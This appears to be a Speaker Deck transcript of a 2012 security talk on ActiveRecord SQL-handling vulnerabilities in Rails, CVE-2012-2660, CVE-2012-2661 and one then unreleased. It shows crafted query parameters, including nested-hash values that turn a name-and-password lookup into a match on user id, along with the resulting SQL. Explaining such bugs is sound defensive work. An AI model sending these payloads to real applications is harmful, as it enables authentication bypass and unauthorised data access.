Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
62
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
120
The Evolution of Rails Security
presidentbeef
1
740
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
110
Practical Static Analysis for Continuous Application Security
presidentbeef
0
160
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
370
Continuous Security with Practical Static Analysis
presidentbeef
1
270
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
190
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.1k
Tales from the Crypt
presidentbeef
1
190
Other Decks in Programming
See All in Programming
as(型アサーション)を書く前にできること
marokanatani
10
2.7k
Jakarta EE meets AI
ivargrimstad
0
690
CSC509 Lecture 11
javiergs
PRO
0
180
AI時代におけるSRE、 あるいはエンジニアの生存戦略
pyama86
6
1.2k
2024/11/8 関西Kaggler会 2024 #3 / Kaggle Kernel で Gemma 2 × vLLM を動かす。
kohecchi
5
940
よくできたテンプレート言語として TypeScript + JSX を利用する試み / Using TypeScript + JSX outside of Web Frontend #TSKaigiKansai
izumin5210
6
1.7k
RubyLSPのマルチバイト文字対応
notfounds
0
120
Compose 1.7のTextFieldはPOBox Plusで日本語変換できない
tomoya0x00
0
200
3 Effective Rules for Using Signals in Angular
manfredsteyer
PRO
0
100
Why Jakarta EE Matters to Spring - and Vice Versa
ivargrimstad
0
1.2k
見せてあげますよ、「本物のLaravel批判」ってやつを。
77web
7
7.8k
どうして僕の作ったクラスが手続き型と言われなきゃいけないんですか
akikogoto
1
120
Featured
See All Featured
Into the Great Unknown - MozCon
thekraken
32
1.5k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
31
2.7k
Mobile First: as difficult as doing things right
swwweet
222
8.9k
Docker and Python
trallard
40
3.1k
Building Applications with DynamoDB
mza
90
6.1k
Keith and Marios Guide to Fast Websites
keithpitt
409
22k
Making Projects Easy
brettharned
115
5.9k
Designing Experiences People Love
moore
138
23k
Being A Developer After 40
akosma
87
590k
Building Your Own Lightsaber
phodgson
103
6.1k
Gamification - CAS2011
davidbonilla
80
5k
GraphQLとの向き合い方2022年版
quramy
43
13k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1
presidentbeef
marokanatani
ivargrimstad
javiergs
pyama86
kohecchi
izumin5210
notfounds
tomoya0x00
manfredsteyer
77web
akikogoto
thekraken
rmw
swwweet
trallard
mza
keithpitt
brettharned
moore
akosma
phodgson
davidbonilla
quramy
![ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_2.jpg){kind=link}
![Query Parameters ?name[] {"name"=>[nil]}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_3.jpg){kind=link}
![ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_4.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_7.jpg){kind=link}
![ActiveRecord Query User.where("users.name" => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_8.jpg){kind=link}
![Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_9.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name], :password => params[:password])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_13.jpg){kind=link}
![Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_14.jpg){kind=link}
